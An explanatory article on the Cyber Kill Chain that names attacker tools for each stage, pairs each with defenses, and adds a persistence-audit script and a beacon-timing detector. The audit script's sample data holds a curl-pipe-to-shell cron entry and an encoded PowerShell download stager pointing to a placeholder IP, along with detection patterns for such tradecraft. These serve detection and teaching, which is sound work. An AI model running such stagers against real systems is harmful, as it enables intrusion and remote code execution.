The Cyber Kill Chain: Lockheed Martin’s Cyber Attack Model
The Cyber Kill Chain is a model developed by Lockheed Martin that describes an intrusion as a fixed sequence of stages an attacker must complete; disrupting any one stage breaks the chain.
The Cyber Kill Chain Has 7 Stages:
Reconnaissance: Gathering information on the target to plan the attack.
Weaponization: Pairing an exploit with a payload (malware) inside a deliverable file or tool.
Delivery: Transmitting the weapon to the target, often via an email attachment, a link, or removable media.
Exploitation: Triggering a vulnerability so the payload executes on the target.
Installation: Establishing persistence so the malware survives reboots and log-offs.
Command & Control (C2): Opening a channel the attacker uses to control the compromised system remotely.
Actions on Objectives: Carrying out the final goal, such as stealing data or causing damage.
Defenders use the model to map detections and controls to each stage so an intrusion can be stopped before the attacker reaches the objective; red teams use the same sequence to plan and structure an engagement from end to end.
Phase 1: Reconnaissance
This phase involves collecting information about the target, such as IP ranges, domain names and subdomains, employee names and email address formats, exposed services, and known vulnerabilities in the software behind them, to craft a tailored attack plan.
Popular tools include OSINT platforms like Maltego and SpiderFoot (automated collection and link analysis across public sources), theHarvester for pulling email addresses, subdomains and hosts out of search engines and public databases, Recon-ng as a modular reconnaissance framework, and Nmap for active port and service scanning. Passive OSINT leaves no trace on the target; active scanning does, which is why the defensive controls for this phase focus on the active part.
Phase 2: Weaponization
Here, attackers create or customize malicious tools, such as ransomware, trojans, or remote access tools, by pairing an exploit with a payload inside a deliverable format like a PDF, an executable, or an Office document with macros. This step takes place entirely on the attacker's side, before anything touches the target.
Common tools include Metasploit (msfvenom) for generating payloads and building exploits, the Veil Framework for producing payloads that evade antivirus signatures, and, historically, browser exploit kits like Angler or Nuclear that automated weaponization for drive-by attacks.
Phase 3: Delivery
This stage focuses on transmitting the weapon to the target, often through phishing emails, malicious links, compromised websites, USB drives, or watering hole attacks that plant the weapon on sites the target is known to visit.
Popular methods include phishing frameworks like SET (Social-Engineer Toolkit), spoofed sender addresses (which succeed against domains that do not publish and enforce SPF, DKIM and DMARC), and the Browser Exploitation Framework (BeEF), which hooks a victim's browser through a delivered script and then pushes further payloads to it.
Phase 4: Exploitation
Attackers trigger vulnerabilities in the target system, such as unpatched software, misconfigured servers, or weak authentication, to run code and gain initial access; the same step recurs later in the intrusion when they elevate privileges.
Widely used tools include Metasploit, Exploit-DB as an archive of public exploits, Burp Suite for web application exploitation, and custom scripts or zero-day exploits tailored to specific weaknesses.
Phase 5: Installation
In this phase, malware is installed to maintain persistent access, achieved through methods like cron jobs on Unix-like systems, registry key modifications (e.g., Run and RunOnce keys) on Windows, scheduled tasks via Task Scheduler, service creation, WMI event subscriptions, or deploying backdoors and rootkits.
Tools like PowerShell Empire, Cobalt Strike and PoshC2 (post-exploitation frameworks with built-in persistence modules) and Backdoor Factory (which patches a legitimate binary with shellcode) are commonly employed.
Phase 6: Command & Control
Once installed, the implant opens a channel back to attacker-controlled infrastructure and waits for instructions. The channel is usually disguised as ordinary traffic (HTTPS beacons to a web server, DNS queries, or messages to a legitimate cloud or chat service) and is typically sent at a fixed interval with random jitter so that it blends in with normal activity. Everything after this point, including lateral movement and data theft, depends on this channel staying up.
C2 frameworks such as Cobalt Strike, PowerShell Empire, PoshC2, and Metasploit's Meterpreter provide the server side, the beacon that runs on the victim, and configurable traffic profiles that shape what the beacon looks like on the wire.
Phase 7: Actions on Objectives
The final phase involves executing the attacker's goal, such as data exfiltration, system disruption, deploying additional malware, ransomware encryption, or lateral movement across the network to reach the systems that hold the real target.
Tools like Mimikatz for credential harvesting, BloodHound for mapping Active Directory attack paths, ordinary file-transfer clients like FileZilla or WinSCP for exfiltration over FTP/SFTP, and ransomware families like Locky or Ryuk for the encryption stage are frequently seen here.
Defending Each Stage of the Cyber Kill Chain
The Cyber Kill Chain model empowers defenders to proactively mitigate attacks by addressing each of its seven stages with tailored strategies and tools:
Phase 1: Reconnaissance
Defenders can limit what reconnaissance reveals by minimizing public-facing information, such as employee directories, internal hostnames, and software versions in service banners or job postings. Publishing SPF and DMARC records does not hide anything, but it makes the gathered data harder to use, because spoofed email from the organisation's own domain will be rejected.
Network security monitoring with solutions like Splunk or Elastic Stack can reveal scanning against external hosts, and regular OSINT audits with tools like Maltego show the defender the same picture the attacker assembles, so that exposed information can be removed or watched.
Phase 2: Weaponization
Weaponization happens on the attacker's own infrastructure, so defenders cannot observe it directly. What they can do is shrink the set of weaknesses a weapon could use by keeping software and systems patched and by running vulnerability management tools like Nessus or Qualys to find what is still exposed.
Detonating captured samples in a sandbox (e.g., Cuckoo Sandbox) reveals how a weapon is built and yields indicators for the later stages, and restricting which executable file types endpoints will run narrows what a weapon can be.
Phase 3: Delivery
Defenders can block malicious deliveries by deploying email filters (e.g., Proofpoint) to catch phishing attempts, using web gateways like Zscaler to filter malicious links, and educating users with security awareness training.
Network intrusion detection systems (NIDS) like Snort or Suricata can identify, and in inline (IPS) mode block, traffic patterns associated with payload delivery.
Phase 4: Exploitation
Defenders can prevent exploitation by regularly patching vulnerabilities, using endpoint detection and response (EDR) tools like CrowdStrike or Microsoft Defender to detect exploits in real-time, and enforcing the principle of least privilege to limit access. Web application firewalls (WAFs) like ModSecurity can also protect against web-based exploits.
Phase 5: Installation
Defenders can thwart installation by monitoring for unauthorized changes with file integrity monitoring (FIM) tools like Tripwire, restricting administrative privileges, and using antivirus or EDR solutions to detect and remove malware.
Disabling unnecessary services, auditing cron jobs, and locking down registry keys or scheduled tasks further enhance persistence prevention.
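Auditing cron jobs, Run keys and scheduled tasks is only useful if you know what to look for in them. The script below is an added example, not code from the original article; it applies the persistence techniques listed in Phase 5 above from the defender's side, flagging autorun entries that point into user-writable directories, launch hidden or encoded PowerShell, or download and run code. The entries in SAMPLE_ENTRIES are constructed; on a real host the same shape can be filled from `crontab -l` for each user, `reg query` against the Run keys, `schtasks /query /v /fo CSV`, or an Autoruns export. The rule list is a starting point, not a complete detection set.

```python
"""Audit persistence entries (cron jobs, Run keys, scheduled tasks) for signs
of attacker tradecraft.

Added example; not code from the original article. SAMPLE_ENTRIES is
constructed. The rules decode -EncodedCommand payloads before matching, since
the interesting strings are usually inside the base64, not beside it.
"""
import base64
import re

# PowerShell's -EncodedCommand takes base64 of a UTF-16LE string. The sample
# payload is encoded here so the constructed entry below is exact.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16le")).decode()

SAMPLE_ENTRIES = [
    {"source": "cron:root", "name": "logrotate",
     "command": "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf"},
    {"source": "cron:www-data", "name": "update",
     "command": "@reboot curl -s http://203.0.113.5/x.sh | sh"},
    {"source": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "OneDriveSync",
     "command": f"powershell.exe -nop -w hidden -enc {ENCODED_STAGER}"},
    {"source": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "name": "VendorUpdater",
     "command": r'"C:\Program Files\Vendor\updater.exe" /background'},
    {"source": "schtasks", "name": r"\Microsoft\Windows\Maintenance\Cleanup",
     "command": r"C:\Users\alice\AppData\Local\Temp\svc.exe"},
]

# (tag, pattern) pairs; each is matched against the raw command and any decoded payload.
RULES = [
    ("user-writable-path", re.compile(
        r"\\AppData\\(Local|Roaming)\\|%TEMP%|%APPDATA%|\\Users\\Public\\|(^|\s)/(tmp|var/tmp|dev/shm)/", re.I)),
    ("encoded-powershell", re.compile(
        r"powershell(\.exe)?\b.*\s-(enc|encodedcommand|e|ec)\s", re.I)),
    ("hidden-or-bypass", re.compile(
        r"\s-(w|window|windowstyle)\s+hidden\b|\s-nop\b|\s-(ep|ex|exec|executionpolicy)\s+bypass\b", re.I)),
    ("download-and-run", re.compile(
        r"(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b|mshta\s+https?:|regsvr32\b.*/i:https?:"
        r"|DownloadString|DownloadFile|Invoke-WebRequest", re.I)),
    ("base64-decode", re.compile(r"base64\s+(-d|--decode)\b|FromBase64String", re.I)),
]


def decode_encoded_powershell(command: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    match = re.search(r"\s-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]+)", command, re.I)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_entry(entry: dict):
    """Run every rule over the raw command and, when present, the decoded
    PowerShell payload; return (sorted tags, decoded payload or None)."""
    decoded = decode_encoded_powershell(entry["command"])
    texts = [entry["command"]] + ([decoded] if decoded else [])
    tags = {tag for text in texts for tag, pattern in RULES if pattern.search(text)}
    return sorted(tags), decoded


def audit_persistence(entries: list) -> list:
    """Return one finding per entry that triggers at least one rule."""
    findings = []
    for entry in entries:
        tags, decoded = audit_entry(entry)
        if tags:
            findings.append({"source": entry["source"], "name": entry["name"],
                             "tags": tags, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in audit_persistence(SAMPLE_ENTRIES):
        print(f"{finding['source']} :: {finding['name']} -> {', '.join(finding['tags'])}")
        if finding["decoded"]:
            print(f"    decoded: {finding['decoded']}")
```

The benign logrotate job and the vendor updater produce no findings; the three others are flagged for the reasons a responder would expect. The decoded stager is the most important output: the registry value itself shows only `-enc` followed by base64, and without the decode step the `DownloadString` call would never match a rule.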
Phase 6: Command & Control (C2)
Defenders can disrupt C2 communications by monitoring outbound traffic with network security tools like Palo Alto Networks or Darktrace, blocking known malicious domains with DNS filtering (e.g., Cisco Umbrella), and using behaviour-based detection (beacon timing, newly registered or rarely seen destinations, TLS fingerprints) to identify encrypted C2 channels whose content cannot be inspected. Segmenting networks and enforcing zero-trust policies also limit lateral movement once a channel is established.
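The timing signal mentioned above is one of the few properties of an encrypted C2 channel a defender can still measure. The script below is an added example, not code from the original article or from any vendor; it groups outbound connections by source, destination and port and flags groups whose inter-arrival times are too regular to be a person. The log lines are constructed in the form `epoch_seconds src_ip dst_ip dst_port bytes_out`; a real deployment would feed Zeek conn.log, proxy or firewall records reshaped the same way. The thresholds `min_connections` and `max_cv` are assumptions to be tuned per environment.

```python
"""Detect beacon-like outbound connections from connection log lines.

Added example (not part of the original article). Log lines are constructed
in the shape 'epoch_seconds src_ip dst_ip dst_port bytes_out'.
"""
import statistics
from collections import defaultdict

# Constructed traffic: a 60-second beacon with +/-2 s jitter and a constant
# size to 203.0.113.9, plus irregular browsing-like traffic to 198.51.100.20.
_BEACON_GAPS = [60, 61, 59, 60, 62, 58, 60, 61, 60, 59, 60]
_HUMAN_GAPS = [5, 400, 37, 900, 12, 250, 60, 3]


def _build_sample_log() -> list[str]:
    lines = []
    t = 1_700_000_000
    lines.append(f"{t} 10.0.0.5 203.0.113.9 443 612")
    for gap in _BEACON_GAPS:
        t += gap
        lines.append(f"{t} 10.0.0.5 203.0.113.9 443 612")
    t = 1_700_000_030
    lines.append(f"{t} 10.0.0.7 198.51.100.20 443 4120")
    for gap in _HUMAN_GAPS:
        t += gap
        lines.append(f"{t} 10.0.0.7 198.51.100.20 443 {gap * 37 % 5000 + 500}")
    # Records arrive interleaved in a real log, so sort by timestamp.
    return sorted(lines, key=lambda line: int(line.split()[0]))


SAMPLE_LOG = _build_sample_log()


def parse_line(line: str) -> tuple:
    ts, src, dst, port, nbytes = line.split()
    return int(ts), src, dst, int(port), int(nbytes)


def find_beacons(lines, min_connections: int = 8, max_cv: float = 0.2) -> list:
    """Group connections per (src, dst, port) and flag those whose inter-arrival
    times are too regular. CV = stdev / mean of the gaps: a timer with small
    jitter gives a low CV, human-driven traffic does not."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst, port, nbytes = parse_line(line)
        flows[(src, dst, port)].append((ts, nbytes))
    hits = []
    for (src, dst, port), conns in flows.items():
        if len(conns) < min_connections:
            continue
        conns.sort()
        gaps = [later[0] - earlier[0] for earlier, later in zip(conns, conns[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            sizes = [n for _, n in conns]
            mean_size = statistics.mean(sizes)
            hits.append({
                "src": src, "dst": dst, "port": port,
                "connections": len(conns),
                "mean_interval_s": round(mean_gap, 1),
                "interval_cv": round(cv, 3),
                # Near-constant request sizes are a second beacon indicator.
                "size_cv": round(statistics.pstdev(sizes) / mean_size, 3) if mean_size else 0.0,
            })
    return sorted(hits, key=lambda hit: hit["interval_cv"])


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Frameworks such as Cobalt Strike let the operator add jitter to the sleep interval, which raises the CV and pushes the beacon toward the threshold; the trade-off for the attacker is that high jitter slows tasking. Combining the timing score with the size CV and with destination reputation keeps false positives from software updaters, which also poll on timers, manageable.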
Phase 7: Actions on Objectives
Defenders can mitigate the impact by implementing data loss prevention (DLP) tools like Symantec DLP to prevent exfiltration, using SIEM systems (e.g., Splunk, QRadar) to detect anomalous activities, and maintaining offline backups to recover from ransomware or disruptions.
Incident response plans and rapid containment strategies minimize damage and restore operations. Because every stage of the chain offers a detection or prevention opportunity, defenders who cover all seven raise the attacker's cost at each step instead of relying on a single control.